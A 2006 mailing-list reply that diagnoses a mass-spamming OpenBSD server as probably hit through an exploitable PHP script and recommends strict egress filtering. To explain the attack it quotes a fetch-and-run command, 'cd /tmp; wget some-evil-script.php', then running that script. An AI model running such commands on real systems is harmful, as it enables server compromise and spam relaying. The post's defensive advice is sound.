On Wednesday 25 January 2006 12:09, you wrote:
> ... I've noticed that the
> "mailstats" command reports 130000 (!!!) messages sent (!) outside. My
> computer is a small server running OpenBSD 3.8, MySQL+PHP+Apache for the
> website;

There's one potential smoking gun right there. PHP. You know PGP stands for 
'Pretty Good Privacy'? Well, I think PHP stands for 'Pretty Hopeless 
Privacy'.

What PHP scripts are you or your users running? Any phpbb installations? 
*nukes? What other PHP scripts are installed? phpbb and the various nukes are 
notorious for exploits.

It is quite often the case that well known PHP scripts are getting exploited - 
I've seen it twice in the field where a PHP script was exploited by 
phishers/spammers. The general sequence of events is:

1. User installs exploitable PHP script
2. Phisherman finds it.
3. Phisherman exploits it, and using the shell execution exploit, executes 
'cd /tmp; wget some-evil-script.php' and then exploits it again to 
run /tmp/some-evil-script.php (in PHP command line mode).

Some-evil-script.php turns out to be a spamming script. They don't need to 
root your server, they just need to be able to write somewhere. Have a poke 
around where Apache has write access, I bet you find some dodgy PHP scripts. 
Look through the logs for attempted exploits on PHP scripts (you can usually 
find %-encoded versions of commands in the arguments to the PHP script).

The other possibility is one of your users has a virus/trojan/worm that uses 
their Outlook settings to relay mail through your mail server. Tell your 
users to relay through their ISP only, you just don't want to get involved 
with being the mail relay for your users if you can help it. However, I 
suspect you've been exploited via a buggy insecure PHP script.

To stop this happening again:
Apply strict egress filtering. Allow *no traffic out at all*. There is 
probably no reason your server should be making any outbound connections 
except via a few daemons (DNS and outbound SMTP spring to mind - for those 
use 'pf' rules that only allow BIND and sendmail to send data out on those 
ports). Strict egress filtering will prevent phishers/spammers from managing 
to do the 'wget some-evil-script.php' to get the spamming script onto your 
server.
No, 'chmod 700 wget' is no substitute - it's trivial to write a Perl script 
that can be injected via your vulnerable PHP script to open a socket to a 
remote server and download a file. Block ALL OUTBOUND ACCESS to anything 
except for what explicitly should happen: DNS lookups to the two or three DNS 
servers listed in resolv.conf, and SMTP access (if you absolutely cannot 
avoid allowing outbound SMTP) to the sendmail process only (user _sendmail).

Egress filtering is often forgotten, missed or not considered - but it is 
every bit as important as filtering inbound traffic (possibly more so, as you 
have discovered). Never forget egress filtering.

And keep an eye on your users - particularly what PHP scripts they have 
installed. Apply a LART if they don't keep up to date with security patches. 
Have a policy of banning scripts known to have a bad security track record.
